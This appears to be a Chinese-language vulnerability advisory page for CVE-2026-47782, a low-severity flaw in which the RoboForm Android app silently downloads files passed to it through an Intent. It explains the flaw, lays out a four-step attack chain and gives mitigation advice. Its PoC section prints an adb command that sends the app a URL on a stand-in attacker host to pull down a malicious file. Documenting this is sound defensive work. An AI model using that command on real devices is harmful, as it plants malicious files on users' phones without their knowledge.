CVE-2026-47782 CVSS 3.3 低危

CVE-2026-47782 RoboForm 密码管理器静默下载漏洞

披露日期: 2026-05-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-47782

漏洞类型

任意文件下载

CVSS评分

3.3 低危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

RoboForm Password Manager (Android)

漏洞概述

Android应用“RoboForm Password Manager”存在安全漏洞，其对Android Intent的处理缺乏足够的URL验证及用户确认机制。攻击者可通过Intent传入恶意网页链接，导致应用在无通知的情况下静默下载文件，从而可能影响设备完整性。

技术细节

该漏洞源于RoboForm Android应用在处理Intent时未对传入的URL参数实施严格的校验。应用暴露的组件接收外部Intent并直接解析其中的数据作为下载目标，绕过了必要的安全确认流程。攻击者可利用此缺陷，通过构造包含恶意URL的Intent（AV:L），在需要一定用户交互（UI:R）的情况下，诱导应用执行下载操作。尽管CVSS评分较低（3.3），且未直接泄露敏感信息（C:N），但此行为违反了最小权限原则，可能导致完整性受损（I:L），例如被用于下载恶意载荷或占用存储资源。

攻击链分析

STEP 1

1. 攻击准备

攻击者准备包含恶意文件下载链接的URL，并编写发送Intent的代码或利用ADB命令。

STEP 2

2. 触发向量

在用户设备上，通过恶意应用或PC端（已开启USB调试）向RoboForm应用发送包含恶意URL的Intent。

STEP 3

3. 漏洞利用

RoboForm接收Intent，由于未验证URL且无用户确认弹窗，应用后台自动开始下载指定文件。

STEP 4

4. 攻击完成

恶意文件被静默保存至设备存储中，可能被用于后续攻击或消耗系统资源。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC to exploit RoboForm Intent handling
# This command sends a malicious intent to trigger a silent download
# Usage: adb shell <command>

adb shell am start -n com.siber.roboform/.MainActivity -eu url "http://attacker.example.com/malicious_file.bin"

影响范围

RoboForm Password Manager for Android (具体受影响版本未在提供信息中明确列出，建议更新至最新版)

防御指南

临时缓解措施

建议用户立即检查并更新RoboForm应用至最新版本以修复此漏洞。在未修复前，应谨慎授予应用敏感权限，并避免在设备上安装未知来源的应用，防止恶意应用通过Intent机制利用此漏洞。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-47782
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-47782
3 Details https://www.cvedetails.com/cve/CVE-2026-47782/
4 VulDB https://vuldb.com/cve/CVE-2026-47782
5 Link https://jvn.jp/en/vu/JVNVU93461473/
6 Link https://play.google.com/store/apps/details?id=com.siber.roboform
7 Link https://www.roboform.com/news-android

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表